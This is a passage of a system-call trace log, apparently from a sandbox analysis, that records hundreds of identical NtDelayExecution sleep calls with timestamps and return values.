(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.830] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.843] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0146.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.099] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.170] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.213] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.219] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.268] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.277] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.279] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.280] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.282] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.286] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.291] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.670] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.679] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.680] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.682] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.684] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.691] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.693] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.694] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.696] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.705] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.708] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.740] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.744] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.760] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.762] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.775] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.889] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.898] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.913] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0147.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.094] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.127] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.143] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.187] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.199] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.212] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.215] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.217] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.219] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.220] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.229] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.255] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.261] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.267] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.268] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.277] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0148.313] NtDelayExecution 